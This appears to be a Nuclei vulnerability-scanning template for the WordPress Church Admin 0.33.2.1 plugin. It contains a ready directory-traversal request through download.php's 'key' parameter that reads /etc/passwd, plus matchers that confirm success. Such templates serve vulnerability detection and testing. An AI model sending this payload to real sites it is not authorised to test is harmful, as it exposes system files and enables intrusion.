nuclei-templates/vulnerabilities/wordpress/church-admin-lfi.yaml

28 lines
757 B
YAML
Raw Normal View History

id: church-admin-lfi
2021-09-28 00:31:37 +00:00
info:
name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack.
reference:
- https://wpscan.com/vulnerability/8997
- https://id.wordpress.org/plugins/church-admin/
2021-09-28 00:31:37 +00:00
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200